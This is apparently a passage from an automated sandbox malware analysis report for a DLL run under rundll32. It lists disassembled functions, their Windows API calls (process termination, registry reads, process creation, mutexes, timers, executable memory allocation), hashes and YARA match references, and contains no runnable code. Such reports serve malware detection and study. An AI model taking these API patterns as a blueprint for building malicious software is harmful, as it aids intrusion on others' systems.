                                          • Instruction Fuzzy Hash: 20115476501028BBDF215B95DC49DEF7FBEEF463A1B1144A1FA09E3120CB314995DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B532BD Relevance: 9.1, APIs: 6, Instructions: 67stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • OpenProcess.KERNEL32(00000E39,00000000,?), ref: 00B532E5
                                          • _strupr.NTDLL ref: 00B53320
                                          • lstrlen.KERNEL32(00000000), ref: 00B53328
                                          • TerminateProcess.KERNEL32(00000000,00000000,?,00000000,?), ref: 00B53367
                                          • CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104), ref: 00B5336E
                                          • GetLastError.KERNEL32 ref: 00B53376
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$CloseErrorHandleLastOpenTerminate_struprlstrlen
                                          • String ID:
                                          • API String ID: 110452925-0
                                          • Opcode ID: 690f223c12b079cf13e6d7602ba4aed893762e1f54c071a43315f47a7fd1b868
                                          • Instruction ID: 43df0244ef44ff86041736622d61772354613eff31f5c1a90c96ddfa4e947e1a
                                          • Opcode Fuzzy Hash: 690f223c12b079cf13e6d7602ba4aed893762e1f54c071a43315f47a7fd1b868
                                          • Instruction Fuzzy Hash: 57119172500114FFDB106BB49C88EAE37ECEB88B92B104495FA0AD3151EF74CAD88B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B5A921 Relevance: 9.1, APIs: 6, Instructions: 66registrymemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenKeyA.ADVAPI32(80000001,?), ref: 00B5A93F
                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00B5A96D
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00B5A97F
                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00B5A9A4
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00B5A9BF
                                          • RegCloseKey.ADVAPI32(?), ref: 00B5A9C9
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: HeapQueryValue$AllocateCloseFreeOpen
                                          • String ID:
                                          • API String ID: 170146033-0
                                          • Opcode ID: 258bdd115fc5965c97da09c3e0c101b5938ca78b0b0d491fb006d7fa0abb174a
                                          • Instruction ID: 847330a84349ff2e2e14f88e49e5d52ea3b167a9e03bc2f6f5204805185d9a69
                                          • Opcode Fuzzy Hash: 258bdd115fc5965c97da09c3e0c101b5938ca78b0b0d491fb006d7fa0abb174a
                                          • Instruction Fuzzy Hash: 3911E7B6900118FFDB119B98DC88DEEBBFDEB49701B1101A6E909E3124DB315E95DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B5B865 Relevance: 9.1, APIs: 6, Instructions: 65memorystringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlen.KERNEL32(00000F00,?,-00000001,00000000,?,?,?,00B54417,?,00000000,000000FF,?,00000F00), ref: 00B5B876
                                          • lstrlen.KERNEL32(?,?,-00000001,00000000,?,?,?,00B54417,?,00000000,000000FF,?,00000F00), ref: 00B5B87D
                                          • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 00B5B88F
                                          • _snprintf.NTDLL ref: 00B5B8B5
                                            • Part of subcall function 00B5B968: memset.NTDLL ref: 00B5B97D
                                            • Part of subcall function 00B5B968: lstrlenW.KERNEL32(00000000,00000000,00000000,77D5DBB0,00000020,00000000), ref: 00B5B9B6
                                            • Part of subcall function 00B5B968: wcstombs.NTDLL ref: 00B5B9C0
                                            • Part of subcall function 00B5B968: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,77D5DBB0,00000020,00000000), ref: 00B5B9F1
                                            • Part of subcall function 00B5B968: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00B5B8C3), ref: 00B5BA1D
                                            • Part of subcall function 00B5B968: TerminateProcess.KERNEL32(?,000003E5), ref: 00B5BA33
                                            • Part of subcall function 00B5B968: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00B5B8C3), ref: 00B5BA47
                                            • Part of subcall function 00B5B968: CloseHandle.KERNEL32(?), ref: 00B5BA7A
                                            • Part of subcall function 00B5B968: CloseHandle.KERNEL32(?), ref: 00B5BA7F
                                          • _snprintf.NTDLL ref: 00B5B8E9
                                            • Part of subcall function 00B5B968: GetLastError.KERNEL32 ref: 00B5BA4B
                                            • Part of subcall function 00B5B968: GetExitCodeProcess.KERNEL32(?,00000001), ref: 00B5BA6B
                                          • HeapFree.KERNEL32(00000000,00000000,00000000,000000FF,00000000,000000FF,?,00000F00), ref: 00B5B906
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Processlstrlen$CloseHandleHeapMultipleObjectsWait_snprintf$AllocateCodeCreateErrorExitFreeLastTerminatememsetwcstombs
                                          • String ID:
                                          • API String ID: 1481739438-0
                                          • Opcode ID: d24a7d1e8cabbec47d9bd50ca08c8f672a1ec285bfffd2c9dd2e32068b0250f2
                                          • Instruction ID: af15ce18251a5bc952cc4f43da6c2ff91ba73a77c1beb818a44d657159b4c195
                                          • Opcode Fuzzy Hash: d24a7d1e8cabbec47d9bd50ca08c8f672a1ec285bfffd2c9dd2e32068b0250f2
                                          • Instruction Fuzzy Hash: 12117C72500219BFDF119F54DC84E9E3FACEB44361B114095FE0DA7221CB319E54CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B5A7BF Relevance: 9.1, APIs: 6, Instructions: 64memorystringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlen.KERNEL32(00000000,00000001,00000000,00000000,?,?,00B51B71,00B57E45,00000057,00000000), ref: 00B5A7D5
                                          • RtlAllocateHeap.NTDLL(00000000,00000009,00000001), ref: 00B5A7E8
                                          • lstrcpy.KERNEL32(00000008,00000000), ref: 00B5A80A
                                          • GetLastError.KERNEL32(00B55EAE,00000000,00000000,?,?,00B51B71,00B57E45,00000057,00000000), ref: 00B5A833
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,00B51B71,00B57E45,00000057,00000000), ref: 00B5A84B
                                          • CloseHandle.KERNEL32(00000000,00B55EAE,00000000,00000000,?,?,00B51B71,00B57E45,00000057,00000000), ref: 00B5A854
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateCloseErrorFreeHandleLastlstrcpylstrlen
                                          • String ID:
                                          • API String ID: 2860611006-0
                                          • Opcode ID: 8aaafcd355513dfbed0ad94fc04069467a590016711e3f237aa483df9055ffd4
                                          • Instruction ID: cd02a09cb82c38dc1e041cd20c4f9be21dcd4f4bb8f08dd3f2d6176a980da409
                                          • Opcode Fuzzy Hash: 8aaafcd355513dfbed0ad94fc04069467a590016711e3f237aa483df9055ffd4
                                          • Instruction Fuzzy Hash: 8711B672501205EFDB109FA4DC8899A7BF8FB0536271045B9FD1AE3110DB308D59DB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B666BC Relevance: 9.1, APIs: 6, Instructions: 61stringthreadtimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B666CE
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B666E7
                                          • GetCurrentThreadId.KERNEL32 ref: 00B666F4
                                          • GetSystemTimeAsFileTime.KERNEL32(00000F00,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B66700
                                          • GetTempFileNameA.KERNEL32(00000000,00000000,00000F00,00000000,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B6670E
                                          • lstrcpy.KERNEL32(00000000), ref: 00B66730
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Temp$FilePathTime$AllocateCurrentHeapNameSystemThreadlstrcpy
                                          • String ID:
                                          • API String ID: 1175089793-0
                                          • Opcode ID: 5a410d2304c2b21cb20b3b3ad88547ae17cd32296e5dabb9cb58055603786ae1
                                          • Instruction ID: dea406bb0f11bba8708e0ac8939c0da802347b165dd659a95693177959bffda1
                                          • Opcode Fuzzy Hash: 5a410d2304c2b21cb20b3b3ad88547ae17cd32296e5dabb9cb58055603786ae1
                                          • Instruction Fuzzy Hash: 6D012173A001157B97115BAA9C8CE7B7BECDA95B45B090059FE09E7210DF74EC4187B0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B6AE86 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 207COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLastmemset
                                          • String ID: vids
                                          • API String ID: 3276359510-3767230166
                                          • Opcode ID: b36958489f99b3d5d7a34c0ac065a19e897ce9191fc5b15fa3eead2aa8c59ab6
                                          • Instruction ID: efc7dca06cebcd3948c79773950606b63d757413cc395331a1693f790d602bfe
                                          • Opcode Fuzzy Hash: b36958489f99b3d5d7a34c0ac065a19e897ce9191fc5b15fa3eead2aa8c59ab6
                                          • Instruction Fuzzy Hash: AD8109B1D102199FCF20DFA4C8859AEBBF9EF08700F10819AF919E7251D7359A85CF61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B56E8E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120memorystringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00B56F18
                                          • lstrlen.KERNEL32(?,?), ref: 00B56F49
                                          • memcpy.NTDLL(00000008,?,00000001), ref: 00B56F58
                                          • HeapFree.KERNEL32(00000000,00000000,?), ref: 00B56FDA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateFreelstrlenmemcpy
                                          • String ID: W
                                          • API String ID: 379260646-655174618
                                          • Opcode ID: d54716c9f3fcaf45ea30a91ca2f01dfe5c3273f04a470eadebd2b0d3ccd418b3
                                          • Instruction ID: de3575c60e897ac2bd881504faf29a3f6ff2d3779675e83a77964c765fee5b64
                                          • Opcode Fuzzy Hash: d54716c9f3fcaf45ea30a91ca2f01dfe5c3273f04a470eadebd2b0d3ccd418b3
                                          • Instruction Fuzzy Hash: B641BF7450520A9FCB248F28E885BA67BE5EF09306F8484EEED49C7621D731DD8ACB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B58E61 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 112COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.NTDLL ref: 00B58F0C
                                          • FlushFileBuffers.KERNEL32(00000000,?,00000000,00000000), ref: 00B58F79
                                          • GetLastError.KERNEL32(?,00000000,00000000), ref: 00B58F83
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: BuffersErrorFileFlushLastmemset
                                          • String ID: K$P
                                          • API String ID: 3817869962-420285281
                                          • Opcode ID: 324829981d8bbbf1d2e66bb1e6ff1328c62d7cac98fa157b11b51d2f96248d0d
                                          • Instruction ID: f352fee539370a5b492ee4a3b39b4d16a98e81d037a24df4e177fa0b8e411017
                                          • Opcode Fuzzy Hash: 324829981d8bbbf1d2e66bb1e6ff1328c62d7cac98fa157b11b51d2f96248d0d
                                          • Instruction Fuzzy Hash: 22418C30A00705DFDB208FA4DD8476EBBF2FF98316F5448ADE886A3641DB34A948CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B5F868 Relevance: 8.9, APIs: 7, Instructions: 108stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • memcpy.NTDLL(?,00B538D5,00000000,?,?,?,00B538D5,?,?,?,?,?), ref: 00B5F8A6
                                          • lstrlen.KERNEL32(00B538D5,?,?,?,00B538D5,?,?,?,?,?), ref: 00B5F8C4
                                          • memcpy.NTDLL(?,?,?,?,?,?,?), ref: 00B5F933
                                          • lstrlen.KERNEL32(00B538D5,00000000,00000000,?,?,?,00B538D5,?,?,?,?,?), ref: 00B5F954
                                          • lstrlen.KERNEL32(03F8458B,?,?,?,?,?,?,?), ref: 00B5F968
                                          • memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,?,?), ref: 00B5F971
                                          • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00B5F97F
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrlenmemcpy$FreeLocal
                                          • String ID:
                                          • API String ID: 1123625124-0
                                          • Opcode ID: 4adfbf1783d089a69a73cfeba0832711ca531a68c5591e623f23a9d55eb9b921
                                          • Instruction ID: 1b6c1356cce22d403981a914bfa08c58cbd7d28f87260551550c0ff1a79fb109
                                          • Opcode Fuzzy Hash: 4adfbf1783d089a69a73cfeba0832711ca531a68c5591e623f23a9d55eb9b921
                                          • Instruction Fuzzy Hash: 4E41167680021AAFDF11DF64DD459AB7BA8EF143A0B0444A5FD18A7211E731EE64CBE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B68C96 Relevance: 7.7, APIs: 6, Instructions: 171stringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00B53AA7: ExpandEnvironmentStringsW.KERNEL32(74DB06E0,00000000,00000000,74DB06E0,?,80000001,00B68CB5,?,74DB06E0,00B5407B,?,?,00000000,?), ref: 00B53AB8
                                            • Part of subcall function 00B53AA7: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,00000000,?,80000001,00B68CB5,?,74DB06E0,00B5407B,?,?,00000000,?), ref: 00B53AD5
                                          • lstrlenW.KERNEL32(?,00000000,?,80000001,?,74DB06E0,00B5407B,?,?,00000000,?), ref: 00B68CE2
                                          • lstrlenW.KERNEL32(00000008,?,80000001,?,74DB06E0,00B5407B,?,?,00000000,?), ref: 00B68CE9
                                          • lstrlenW.KERNEL32(?,?,?,80000001,?,74DB06E0,00B5407B,?,?,00000000,?), ref: 00B68D07
                                          • lstrlen.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B68DC5
                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B68DD0
                                          • wsprintfA.USER32 ref: 00B68E12
                                            • Part of subcall function 00B5C6B8: RtlFreeHeap.NTDLL(00000000,00000000,00B71A9A,00000000), ref: 00B5C6C4
                                            • Part of subcall function 00B53486: CreateFileW.KERNEL32(?,C0000000,0000FDE9,00000000,00000001,00000080,00000000,00000008,00000000,0000FDE9,?), ref: 00B534C6
                                            • Part of subcall function 00B53486: GetLastError.KERNEL32 ref: 00B534D0
                                            • Part of subcall function 00B53486: WaitForSingleObject.KERNEL32(000000C8), ref: 00B534F5
                                            • Part of subcall function 00B53486: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000001,00000080,00000000), ref: 00B53518
                                            • Part of subcall function 00B53486: SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00B53540
                                            • Part of subcall function 00B53486: WriteFile.KERNEL32(?,00001388,?,?,00000000), ref: 00B53555
                                            • Part of subcall function 00B53486: SetEndOfFile.KERNEL32(?), ref: 00B53562
                                            • Part of subcall function 00B53486: CloseHandle.KERNEL32(?), ref: 00B5357A
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Filelstrlen$CreateEnvironmentExpandHeapStrings$AllocateCloseErrorFreeHandleLastObjectPointerSingleWaitWritewsprintf
                                          • String ID:
                                          • API String ID: 1727939831-0
                                          • Opcode ID: 5f77b89fcac97d42d796d58d7280f229fc71898e2f9b3eaffcf7ad90e14e8499
                                          • Instruction ID: 3ab351b7706a23a780a06dfe54250d16c6d9c838c435a21a2f15bcbb43bb799f
                                          • Opcode Fuzzy Hash: 5f77b89fcac97d42d796d58d7280f229fc71898e2f9b3eaffcf7ad90e14e8499
                                          • Instruction Fuzzy Hash: A9515E7190020AAFCF019FA8DC45DAE7BFAEF48305B0540A5F908A7221DF3ADE55DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B5FEA8 Relevance: 7.7, APIs: 6, Instructions: 163COMMON
                                          Download Yara Rule
                                          APIs
                                          • memcpy.NTDLL(?,?,00000010,?,?,?,?,?,?,?,?,?,?,00B6F51A,00000000,00000000), ref: 00B5FEF9
                                          • memcpy.NTDLL(00000000,00000000,?,0000011F), ref: 00B5FF8C
                                          • GetLastError.KERNEL32(?,?,0000011F), ref: 00B5FFE4
                                          • GetLastError.KERNEL32 ref: 00B60016
                                          • GetLastError.KERNEL32 ref: 00B6002A
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00B6F51A,00000000,00000000,?,00B5D3E9,?), ref: 00B6003F
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$memcpy
                                          • String ID:
                                          • API String ID: 2760375183-0
                                          • Opcode ID: b7cfe6fefdf35c7287619fac5d519e3c738e8f480f1bd44d903907a1f65e9fd4
                                          • Instruction ID: 46f48cb0f9998a65102188b5b8220de375aebe88de89743125e2fe38ad8bad80
                                          • Opcode Fuzzy Hash: b7cfe6fefdf35c7287619fac5d519e3c738e8f480f1bd44d903907a1f65e9fd4
                                          • Instruction Fuzzy Hash: E3518AB1900209FFDB10DFA9CC88AAEBBF9EB08351F1044A9F905E7250DB358E54DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B6493E Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 146stringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • lstrcpy.KERNEL32(?,00000020), ref: 00B64A3B
                                          • lstrcat.KERNEL32(?,00000020), ref: 00B64A50
                                          • lstrcmp.KERNEL32(00000000,?), ref: 00B64A67
                                          • lstrlen.KERNEL32(?), ref: 00B64A8B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                          • String ID:
                                          • API String ID: 3214092121-3916222277
                                          • Opcode ID: 755a36bd724c3c54ccaa0fe74603f8756b300da649478e7b5c12d9478e5cd1de
                                          • Instruction ID: 26ce51e597b2a59fc1a06c3f77048fda290699709a44b8406c903103142f789b
                                          • Opcode Fuzzy Hash: 755a36bd724c3c54ccaa0fe74603f8756b300da649478e7b5c12d9478e5cd1de
                                          • Instruction Fuzzy Hash: 5551BF31A80618EFCF21DF99C8846AEBBF6EF45315F15809AE8159B251C778AA41CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B510EB Relevance: 7.6, APIs: 6, Instructions: 122stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrlen
                                          • String ID:
                                          • API String ID: 1659193697-0
                                          • Opcode ID: 4ba28b95194a519a189f4b0e6ea2544a69aab05029dfbefc91e21c7e32a0ae39
                                          • Instruction ID: 26539cdab400991017e267350aa75d784e66611b9f928d92dea2c602d3549971
                                          • Opcode Fuzzy Hash: 4ba28b95194a519a189f4b0e6ea2544a69aab05029dfbefc91e21c7e32a0ae39
                                          • Instruction Fuzzy Hash: 1F411E75E0060AAFCB10DF9DC884BAEB7F9EF98305B1489E9DA15E3200D774DD098B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B6B138 Relevance: 7.6, APIs: 5, Instructions: 102synchronizationCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00B70AD0: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 00B70ADC
                                            • Part of subcall function 00B70AD0: SetLastError.KERNEL32(000000B7,?,00B6B14C), ref: 00B70AED
                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00B6B16C
                                          • CloseHandle.KERNEL32(00000000), ref: 00B6B244
                                            • Part of subcall function 00B547FF: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 00B54819
                                            • Part of subcall function 00B547FF: CreateWaitableTimerA.KERNEL32(00B79208,?,?), ref: 00B54836
                                            • Part of subcall function 00B547FF: GetLastError.KERNEL32(?,?), ref: 00B54847
                                            • Part of subcall function 00B547FF: GetSystemTimeAsFileTime.KERNEL32(?,00000000,?,?,?,?), ref: 00B54887
                                            • Part of subcall function 00B547FF: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 00B548A6
                                            • Part of subcall function 00B547FF: HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?), ref: 00B548BC
                                          • GetLastError.KERNEL32 ref: 00B6B22D
                                          • ReleaseMutex.KERNEL32(00000000), ref: 00B6B236
                                            • Part of subcall function 00B70AD0: CreateMutexA.KERNEL32(00B79208,00000000,?,?,00B6B14C), ref: 00B70B00
                                          • GetLastError.KERNEL32 ref: 00B6B251
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$MutexTimerWaitable$CreateOpenTime$CloseFileFreeHandleHeapMultipleObjectsReleaseSystemWait
                                          • String ID:
                                          • API String ID: 1700416623-0
                                          • Opcode ID: c4528a600e5a0e4b2217080ff42f583ca87412556e41cf4324b1be8ed2d0378f
                                          • Instruction ID: 28be6d3c69939a625bc3502c38abe7363eb4c788ffdbd87c5ef4fae5d6ee079b
                                          • Opcode Fuzzy Hash: c4528a600e5a0e4b2217080ff42f583ca87412556e41cf4324b1be8ed2d0378f
                                          • Instruction Fuzzy Hash: 52315475600244AFCB01AF74DC94DAE7FF6FB89315B2444A6E92AD7261DB3589C0CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B6B9A1 Relevance: 7.6, APIs: 5, Instructions: 101memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlImageNtHeader.NTDLL(00000000), ref: 00B6B9BA
                                            • Part of subcall function 00B53AEB: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,00B6A192), ref: 00B53B11
                                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000001,?,00000000,00B6D73E,00000000), ref: 00B6B9FC
                                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000001), ref: 00B6BA4E
                                          • VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,00000000,00000000,?,00000000,00000000,00000001,?,00000000,00B6D73E,00000000), ref: 00B6BA67
                                            • Part of subcall function 00B56706: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00B56727
                                            • Part of subcall function 00B56706: HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000000,?,?,00000000), ref: 00B5676A
                                          • GetLastError.KERNEL32(?,00000000,00B6D73E,00000000,?,?,?,?,?,?,?,00B5BF69,?), ref: 00B6BA9F
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$Free$AllocAllocateErrorFileHeaderImageLastModuleNameVirtual
                                          • String ID:
                                          • API String ID: 1921436656-0
                                          • Opcode ID: 0cf124740f4338b39c915322eafebe02c404c68713d981878e874eab23c14cac
                                          • Instruction ID: 38c712510b5e8846f0aee7147e0fb1646790e494a0605de808689274abafdc13
                                          • Opcode Fuzzy Hash: 0cf124740f4338b39c915322eafebe02c404c68713d981878e874eab23c14cac
                                          • Instruction Fuzzy Hash: 5F315972A00209EFDB11DFA5DC85EAE7BF9EB08350F0004A5E909EB251DF349A84CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B58D50 Relevance: 7.6, APIs: 5, Instructions: 97memorystringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 00B58DD2
                                          • lstrcpy.KERNEL32(00000000,?), ref: 00B58DEB
                                          • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 00B58DF8
                                          • lstrlen.KERNEL32(00B7A3A8,?,?,?,?,?,00000000,00000000,?), ref: 00B58E0A
                                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000,00000000), ref: 00B58E3B
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateFreelstrcpylstrcpynlstrlen
                                          • String ID:
                                          • API String ID: 2734445380-0
                                          • Opcode ID: 3bdc653adcd02619f56bab789dec36e301a6015e6a42485e051527b9bbe8ce62
                                          • Instruction ID: 9b0d2c6d7ad7da4b7c83e4bec354ba75d5193dda0cc9069ce553926427682450
                                          • Opcode Fuzzy Hash: 3bdc653adcd02619f56bab789dec36e301a6015e6a42485e051527b9bbe8ce62
                                          • Instruction Fuzzy Hash: 8B315A72500209EFDB11DF95DC89EEE7BB9EF44311F1085A4FD19A2210DB749A55CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B5275C Relevance: 7.6, APIs: 5, Instructions: 89memorystringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00B6ACA0: RtlEnterCriticalSection.NTDLL(00B79448), ref: 00B6ACA8
                                            • Part of subcall function 00B6ACA0: RtlLeaveCriticalSection.NTDLL(00B79448), ref: 00B6ACBD
                                            • Part of subcall function 00B6ACA0: InterlockedIncrement.KERNEL32(0000001C), ref: 00B6ACD6
                                          • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00B52793
                                          • memcpy.NTDLL(00000000,?,?), ref: 00B527A4
